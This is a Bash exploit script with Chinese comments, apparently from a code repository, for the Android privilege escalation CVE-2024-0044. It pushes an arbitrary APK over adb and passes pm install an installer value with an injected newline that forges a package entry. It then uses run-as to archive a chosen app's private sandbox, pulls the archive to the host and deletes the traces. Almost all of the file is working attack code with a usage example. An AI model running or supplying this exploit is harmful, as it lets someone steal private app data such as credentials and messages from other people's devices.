50 lines
1.5 KiB
Bash
50 lines
1.5 KiB
Bash
|
#!/bin/bash
|
||
|
|
: <<'EOF'
|
||
|
|
利用 CVE-2024-0044 Android 权限提升下载任意目标App沙箱文件。
|
||
|
|
author by Re13orn
|
||
|
|
|
||
|
|
用法:
|
||
|
|
./CVE-2024-0044.sh <apk_path> <package_name>
|
||
|
|
|
||
|
|
参数:
|
||
|
|
<apk_path> 任意一个本地 APK 文件的路径
|
||
|
|
<package_name> 应用包名
|
||
|
|
|
||
|
|
示例:
|
||
|
|
./CVE-2024-0044.sh /path/to/target.apk com.target.mobile
|
||
|
|
EOF
|
||
|
|
|
||
|
|
# 从命令行获取变量
|
||
|
|
APK_PATH=$1
|
||
|
|
PACKAGE_NAME=$2
|
||
|
|
|
||
|
|
# 检查是否提供了必要的参数
|
||
|
|
if [ -z "$APK_PATH" ] || [ -z "$PACKAGE_NAME" ]; then
|
||
|
|
echo "Usage: $0 <any_apk_path> <target_package_name>"
|
||
|
|
exit 1
|
||
|
|
fi
|
||
|
|
|
||
|
|
# 创建临时过程目录、创建文件并设置权限
|
||
|
|
adb shell "mkdir -p /data/local/tmp/tempqazmkp/ && touch /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar && chmod -R 0777 /data/local/tmp/tempqazmkp/"
|
||
|
|
# 推送任意APK文件到设备临时目录
|
||
|
|
adb push $APK_PATH /data/local/tmp/tempqazmkp/any.apk
|
||
|
|
|
||
|
|
PAYLOAD="@null
|
||
|
|
victim 10149 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
|
||
|
|
# 提权并拷贝沙箱文件到指定位置
|
||
|
|
adb shell <<EOF
|
||
|
|
PAYLOAD="$PAYLOAD"
|
||
|
|
pm install -i "\$PAYLOAD" /data/local/tmp/tempqazmkp/any.apk && \
|
||
|
|
run-as victim sh -c 'tar -cf /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar $PACKAGE_NAME'
|
||
|
|
EOF
|
||
|
|
|
||
|
|
# # 获取文件大小
|
||
|
|
filesize=$(adb shell "du -s /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar" | awk '{print $1}')
|
||
|
|
echo "Downloading file: $PACKAGE_NAME.tar (size: $filesize bytes)"
|
||
|
|
|
||
|
|
# 下载沙箱文件到本地
|
||
|
|
adb pull /data/local/tmp/tempqazmkp/$PACKAGE_NAME.tar .
|
||
|
|
|
||
|
|
# 删除临时文件和目录
|
||
|
|
adb shell "rm -rf /data/local/tmp/tempqazmkp/"
|